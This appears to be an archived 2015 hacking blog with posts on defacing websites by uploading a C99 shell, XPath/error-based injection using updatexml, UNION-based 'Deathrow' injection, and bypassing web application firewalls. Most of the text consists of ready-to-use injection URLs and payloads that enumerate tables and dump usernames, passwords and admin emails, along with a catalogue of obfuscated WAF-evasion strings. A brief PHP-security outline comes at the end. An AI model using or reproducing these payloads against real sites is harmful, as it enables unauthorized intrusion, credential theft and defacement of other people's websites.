Wednesday, March 18, 2015

How to inject,upload shell and Deface Website

Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work of system crackers, who break into aweb server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.
The most common method of defacement is using SQL injections which allows gaining administrative access. Another method of defacement is through FTP once the username and password are obtained.
Defacements usually consist of an entire page. This page usually includes the defacer's pseudonym or "Hacking Codename." Sometimes, the Website Defacer makes fun of thesystem administrator for failing to maintain server security. Most times, the defacement is harmless and is only done to show off a system cracker's skills or for Hacktivism; however it can sometimes be used as a distraction to cover up more sinister actions such as uploading malware or deleting essential files from the server.

A backdoor shell is a malicious piece of code (e.g. PHPPythonRuby) that can be uploaded to a site to gain access to files stored on that site. Once it is uploaded, the hacker can use it to edit, delete, or download any files on the site, or upload their own.

How to upload Shell !! 
Hackers usually take advantage of an upload panel designed for uploading images onto sites. This is usually found once the hacker has logged in as the admin of the site. Shells can also be uploaded via exploits or remote file inclusion

TO Deface A wabsite we should following things:
  1. Vulnerable site
  2. admin panel | or | Full path
  3. Shell like C99.php
  4. Mind
  5. Defacing Page


         :::::::::::::::Watch on Youtube ::::::::




              :::::::::::::::Watch on playit.pk::::::::::::::


Friday, March 6, 2015

Error Based Xpath Injection Tutorial

xpath injection








Similar to SQL Injection, XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to. He may even be able to elevate his privileges on the web site if the XML data is being used for authentication (such as an XML based user file).
Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information. Like SQL, you can specify certain attributes to find, and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data.
XPath is a standard language; its notation/syntax is always implementation independent, which means the attack may be automated. There are no different dialects as it takes place in requests to the SQL databeses.
Because there is no level access control it's possible to get the entire document. We won't encounter any limitations as we may know from SQL injection attacks.


Example Vulnerability

We'll use this XML snippet for the examples.
<?xml version="1.0" encoding="utf-8"?>
<Employees>
<Employee ID="1">
<FirstName>Arnold</FirstName>
<LastName>Baker</LastName>
<UserName>ABaker</UserName>
<Password>SoSecret</Password>
<Type>Admin</Type>
</Employee>
<Employee ID="2">
<FirstName>Peter</FirstName>
<LastName>Pan</LastName>
<UserName>PPan</UserName>
<Password>NotTelling</Password>
<Type>User</Type>
</Employee>
</Employees>
Suppose we have a user authentication system on a web page that used a data file of this sort to login users. Once a username and password have been supplied the software might use XPath to look up the user:
VB:
Dim FindUserXPath as String
FindUserXPath = "//Employee[UserName/text()='" & Request("Username") & "' And
Password/text()='" & Request("Password") & "']"
C#:
String FindUserXPath;
FindUserXPath = "//Employee[UserName/text()='" + Request("Username") + "' And
Password/text()='" + Request("Password") + "']";
With a normal username and password this XPath would work, but an attacker may send a bad username and password and get an XML node selected without knowing the username or password, like this:
Username: blah' or 1=1 or 'a'='a
Password: blah
FindUserXPath becomes //Employee[UserName/text()='blah' or 1=1 or
'a'='a' And Password/text()='blah']
Logically this is equivalent to:
//Employee[(UserName/text()='blah' or 1=1) or
('a'='a' And Password/text()='blah')]

Techniques And  Queries Of Xpath Injection

www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(
OUR QUERY HERE)),null)--


How Xpath InjecTion Works Watch This Video



Queries !!! :p



  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml
  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,version()),null)--+
  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,user()),null)--+
  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,database()),null)--+
  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit%200,1)),null)--+

  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit%201,1)),null)--+

  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit%202,1)),null)--+
  • Just increase the limit one by one to get the tables 

  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+column_name+from+information_schema.columns+where+table_name=%27administrator%27+limit%200,1)),null)--+

  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+column_name+from+information_schema.columns+where+table_name=%27administrator%27+limit%201,1)),null)--+

  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+column_name+from+information_schema.columns+where+table_name=%27administrator%27+limit%202,1)),null)--+
  • Increase the limit one by one to get the columns from administrator table

  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+admin_email+from+administrator)),null)--+

  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+admin_password+from+administrator)),null)--+
  • http://vlunrerable site/home.php?selected_blog_id=18+and+updatexml(null,concat(0x3a,(select+admin_password+from+administrator)),null)--+

Watch on Playit .pk


Thursday, March 5, 2015

Deathrow Single Row injection

Death row Injection

What is
Death row ?While injecting a Web application you will usually face it, this is the scenario when the whole array output of the Query do not gets printed. The web application only prints the first.






For Example:

The query "Select username,password from users;" Will output the complete list of users. but now it depends on how the web application is giving you output. So normally in 70% cases you may have to face "Death Row Injection"

To overcome such situation we use Limit or if we are intelligent enough to make a condition through which we can output the data which we actually need. Here we will discuss both of these ways
Let us First understand the Internal Queries
.


Select username from users;


This will output all the usernames...but our target web application is outputting only 1. So in order to iterate through the situation we will user limit.

Syntax : Limit "From Row Number", "Number of Rows"

I hope its very clear to understand that the first parameter takes the row number from which you want to start, and the second one takes number of rows you want to output.

Now let us try it with the above Query

Select Username from users limit 0,1;


Example from the injection Point of view

www.vuln-site.com/index.php?view=43


If you have read the basic injection then i don't need to tell you how to get the error and then comment out the rest part and then find the number of columns. After doing all that let us assume the injection is:

www.vuln-site.com/index.php?view=-43 union select 1,2,3,4,5--



As you can see single Quote is missing after 43 that means i am injecting in a integer Input Query. So now when we try to get the usernames and password using the above Query.

www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users--



The above query will output all rows as once but the web application may just return one. So to get all using Limit we will go one by one.

First Row : www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 0,1-- Second Row : www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit 1,1-- (2nd row)Nth Row : www.vuln-site.com/index.php?view=43 union select 1,2,concat(username,0x3a,password),4,5 from users limit n,1--(nth row)


So now we can keep increasing the first parameter to get each row one by one. But if the database is huge. Damnnn...its a headache to go like this. And a lazy guy like me will never like to go through this torture. Yeah so now there is an another way to handle the situation.

We can use Sub Query to extract particular number of rows from the Database and then concat them into the output. Herez an example to do this one:

Query:

select group_concat(username,0x3a,password,0x0a)from(select username,password from users limit 0,100);



So the above query got 100 rows conctenated into the output. Lets see how the Injection will look like.

First 100 rowswww.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 0,100)a--100 rows from 100th rowwww.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit 100,100)a--100 rows from nth rowwww.vuln-site.com/index.php?view=43 union select 1,2,group_concat(username,0x3a,password),4,5 from (select username,password from users limit n,100)a--


In this way we can speed up the Process...But again if the we think of a Database Containing lacks of Rows. It again becomes a headache. So one will think that we we can increase the number of rows each time we Inject to fasten up the process. Hmmmm but a problem, Group_concat function have a limit of 1024 characters and it will Trim the rest of characters. So there is another way out of it. we can use the Cast Function to increase the Buffer.

Query:

SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM users;


I have increase the buffer to 2048, you can try and increase more like increasing 8192, but not more than that as you know its the default limit of a POST output. hmmm so what if you cant get all at once?. we can again use the Sub Query trick.



SELECT CAST(GROUP_CONCAT(username,0x3a,password,0x0a) AS CHAR(2048)) FROM (SELECT username,password FROM users LIMIT 0,2000)a;



Well Now the process is enough faster. Let us check our Injection.

First 2000 rows:www.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 0,2000)a--2000 rows from 2000th rowwww.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT 2000,2000)a--()2000 rows from nth rowwww.vuln-site.com/index.php?view=43 union SELECT 1,2,CAST(GROUP_CONCAT(username, 0x3a,password,0x0a) AS CHAR(2048)),4,5 FROM (SELECT username,password FROM users LIMIT n,2000)a--



Author : Zenodermus Javanicus

Waf bypass And Show/Dump All Database At One Shot Trick 2015

Waf by pass


Today I am going to show you how to bypass Web Application Firewalls (WAF).

Let's Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the "UNION SELECT" command), you get an 403 Error (and the website says "Forbidden" or "Not Acceptable").

Example:
Code:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)


Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF...

1) Comments:
You can use comments to bypass WAF:

Code:
Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)


However, most WAF identify this method so they still show a "Forbidden" Error...

2) Change the Case of the Letters:
You can also change the Case of the Command:

Code:
Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)


However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

Code:
Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some Firewalls remove the "UNION SELECT" Statement when it is found in the URL... We can do this to exploit this function:

Code:
Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" :-D )
This method doesn't work on ALL Firewalls, as only some of them remove the "UNION" and the "SELECT" commands when they are detected!

5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the "Union" and the "Select" Commands:
Code:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)

I believe that these are the most basic Methods to WAF Bypassing! Let's move on more advanced ones...


Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

Code:
Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....

(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....

If you get a 500, you can exploit it using the Buffer Overflow Method! :: Thanks Crysan for the Test))


2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.

Example:
Code:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
Text to Hex Encoder (Choose the "Hex Encoded for URL" result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the "UNION SELECT" other commands might be blocked.
Common Commands Blocked:

Code:
Code:
COMMAND | WHAT TO USE INSTEAD

@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()

[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! ;-)

4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces "*" (asterisks) with Whitespaces! What we can do is this:

Code:
Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)



So, if you find such a silly function, you can exploit it, in this way! :-D

[+] In addition to the previous example, some other bypasses might be:

Code:

Code:
-15+(uNioN)+(sElECt)....

-15+(uNioN+SeleCT)+...

-15+(UnI)(oN)+(SeL)(ecT)+....

-15+union (select 1,2,3,4...)

Only FOR educational Purpose


                                                                VIDEO DEMO

Wednesday, March 4, 2015

Writing Secure Php


php security


In This Course We  Will Cover This Topics .



Topics Of the Course !!!

what is the threat ? 


  • How can you Analyze the threat ?
  • what Types of threats Are out there?
  • How bad is it ?
  • what Threats Are Specific to PHP?
  • what are some resources to find out more ??


what are the Consequences when a website is not protected Against Attack?
  • Financial loss
  • Loss of Service
  • identity Theft
  • website infection


what are most common forms of aTTack?

  • Cross site Scripting(xss)
  • Remote Code injection 
  • session hijacking, fixaion, and request forgery Sql injection

what Are the  Most  Common  Vulnerabilities aTTackers can Exploit?

  • unplanned information disclosure
  • predictable resource location
  • insufficient authorization
  • improper accesss controls
  • PHP misconfiguration
  • Mishandling file uploads

         
php secutiy download